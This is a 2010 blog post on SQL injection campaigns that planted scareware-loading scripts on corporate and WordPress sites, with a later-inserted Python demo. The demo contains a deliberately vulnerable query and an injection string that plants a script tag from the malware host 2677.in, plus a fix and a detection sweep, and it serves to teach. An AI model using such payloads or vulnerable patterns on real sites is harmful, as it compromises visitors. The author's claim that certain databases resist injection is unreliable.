Saturday, June 12, 2010

Wave of "SQL injection" attacks, loading scareware, reported recently against some major companies; WordPress sites also attacked

On Friday, June 11, at midday, Webroot sent a tweet advising followers of a new wave of malware attacks on major corporate sites using a technique called “SQL injection”. The source story is by Angela Moscaritolo, and is titled “New wave of website attacks seek to spread malware”, with link in SC Magazine here.  One company providing news about this wave is Sucuri Security, which offers services protecting websites from hacks and blacklisting. Its blog posted a technical explanation of the attacks yesterday under the title “Mass infection of IIS/ASP sites – 2677.in/yahoo.js”. The posting names some major corporate sites attacked, including Ameristar, servicewomen, Chicago Public Radio, Industry Week, Book Seller and Publisher, and Spain Holiday. (No, I won’t give links to the URLs!) The posting also displays the source code of the yahoo.js script (which loads the malware from “2677.in/ie.html”) and shows a demonstration Sucuri scan against Ameristar. On June 8, Sucuri had reported a number of sites infected by a similar hack that loaded “robint.us/u.js”.

Microsoft says the hacks exploit vulnerabilities in third-party web applications running on the servers, not in ASP or IIS themselves. Nevertheless, next week I would expect more big patches from Microsoft (with the lengthy restart and reboot times at home!).

The SC Magazine article has a link to another story by the same writer, “Widespread attacks continue against Wordpress sites”, covering WordPress and some other sites based on PHP platforms. Sites hosted by a number of well-known WordPress hosts were affected, including DreamHost, GoDaddy, Bluehost, Media Temple and HostGator. I had discussed these hosts for WordPress on a March 11, 2010 posting on my “IT Job Market” blog (see my Profile). SQL injection is a flaw in how an application assembles its queries from untrusted input, not a property of the database engine, so WordPress's use of MySQL does not by itself expose it; any site that concatenates request parameters into SQL is at risk whatever engine sits behind it. Blogger does not seem to have been implicated.

To my knowledge, IBM mainframe database DB2 (and similar mainframe products) has not been vulnerable to this sort of attack, and I have never encountered a discussion of it in a textbook or encountered a question about it on a Brainbench certification test. IBM mainframe security for database products still seems a leap ahead of many Unix and especially Windows-related products, and this should be borne in mind by companies (and government agencies) where security breaches would be disastrous (as with banks). This is true even though direct connection to DB2 from the web is possible (and I have worked with it in the past myself). But from my own experience, Sybase (on Unix platforms, which I have worked with in conjunction with Java and PowerBuilder) also provides similar very reliable security, to a degree considerably safer than is common with the smaller and cheaper SQL databases offered by ISPs.
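The mechanism behind the IIS/ASP compromises described above, and the point that it does not depend on which database engine is in use, as an added example that is not part of the original post and is not Sucuri's or Microsoft's code. It uses Python with an in-memory SQLite database; the table names, the visit-log endpoint, the sample rows and the function names are constructed for illustration, and only the script host 2677.in/yahoo.js comes from the post. The vulnerable function concatenates a request parameter into its SQL and runs it through a driver call that accepts stacked statements (as classic ASP/ADO against SQL Server did), so the injected UPDATE appends the remote script tag to every page body; the parameterized version stores the same input as plain data; and the sweep at the end is the kind of check an administrator would run to find which rows were hit.

```python
import re
import sqlite3

# Script host named in the Sucuri report the post cites; used as the payload.
SCRIPT_HOST = "2677.in"
PAYLOAD_TAG = '<script src="http://%s/yahoo.js"></script>' % SCRIPT_HOST

# Matches a <script> tag whose src points at an external host; captures the host.
EXTERNAL_SCRIPT = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)', re.IGNORECASE)


def make_db():
    """Constructed sample schema (assumption): a content table and a visit log."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages (title, body) VALUES (?, ?)",
                     [("Home", "<p>Welcome</p>"), ("About", "<p>About us</p>")])
    conn.commit()
    return conn


def log_visit_vulnerable(conn, title):
    """The flaw: the statement is built by string concatenation.
    executescript() runs stacked statements, mirroring drivers such as
    classic ASP/ADO against SQL Server, so an injected UPDATE executes too."""
    sql = "INSERT INTO visits (title) VALUES ('" + title + "');"
    conn.executescript(sql)


def log_visit_safe(conn, title):
    """Same operation with a bound parameter: the input is data only."""
    conn.execute("INSERT INTO visits (title) VALUES (?)", (title,))
    conn.commit()


def attacker_input():
    """Closes the quoted value, appends an UPDATE that tacks the remote script
    tag onto every page body, and comments out the rest of the statement."""
    return "x'); UPDATE pages SET body = body || '" + PAYLOAD_TAG + "'; --"


def text_columns(conn):
    """Yield (table, column) for every text-typed column in user tables.
    Names come from the catalog, not from user input, so formatting them
    into the PRAGMA is safe here."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        for _, col, ctype, *_ in conn.execute('PRAGMA table_info("%s")' % table):
            if "TEXT" in ctype.upper() or "CHAR" in ctype.upper():
                yield table, col


def find_injected_scripts(conn):
    """Sweep all text columns for external <script src=...> tags.
    Returns [(table, column, rowid, host)] so affected rows can be cleaned."""
    hits = []
    for table, col in text_columns(conn):
        rows = conn.execute('SELECT rowid, "%s" FROM "%s"' % (col, table))
        for rowid, value in rows:
            if not isinstance(value, str):
                continue
            for host in EXTERNAL_SCRIPT.findall(value):
                hits.append((table, col, rowid, host))
    return hits


def page_bodies(conn):
    """Current page bodies, in id order, to show what the visitor would receive."""
    return [row[0] for row in conn.execute("SELECT body FROM pages ORDER BY id")]


if __name__ == "__main__":
    db = make_db()
    log_visit_vulnerable(db, attacker_input())
    print("after concatenated query:", find_injected_scripts(db))
    db = make_db()
    log_visit_safe(db, attacker_input())
    print("after parameterized query:", find_injected_scripts(db))
```

Two things worth noticing when running it. After the parameterized call the sweep still reports one hit, in visits.title: that is the attacker's string sitting inertly as data, which is evidence of an attempt rather than a compromise, and it only becomes dangerous if some page later renders that column unescaped. And nothing here is specific to SQLite: the same concatenation, fed to DB2, Sybase, MySQL or SQL Server, is equally wrong, and the same bound parameter fixes it on all of them.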

A company named Acunetix offers a scanner that checks sites for SQL injection vulnerabilities.

Home (and business) users may be infected with scareware without showing any symptoms.

On Jan. 6, my Vista machine showed a scareware fake anti-virus ad, which went away when the browser window was closed. A Webroot scan that day found three viruses (Troj/FakeAvjs.A, Mal/FakeAvJs.A, and Fakealert.gen), and quarantined them. No more symptoms appeared. But on “Blizzard Day”, Feb. 6, a Facebook ad would not go away until a browser window was closed. A Webroot scan quarantined Troj/ByteVer.g. These trojans seem related to the “New York Times” case last September.

Judging from quick searches, SQL injection campaigns that plant scareware seem to have been going on since the summer of 2009.

It’s advisable to run anti-virus scans frequently, especially after virus definition files have been updated or new anti-virus engines have been installed. These may detect and quarantine scareware trojans that cause no symptoms. To date, it seems as though ordinary anti-virus scans do remove these trojans. But it seems that “corporate America” – the establishment -- no longer provides completely safe surfing.

1 comment:

jackob said...

I recently came across your blog and have been reading along. I thought I would leave my first comment.
I don't know what to say except that I have enjoyed reading. Nice blog. I will keep visiting this blog very often.
Thank You
PowerBuilder development company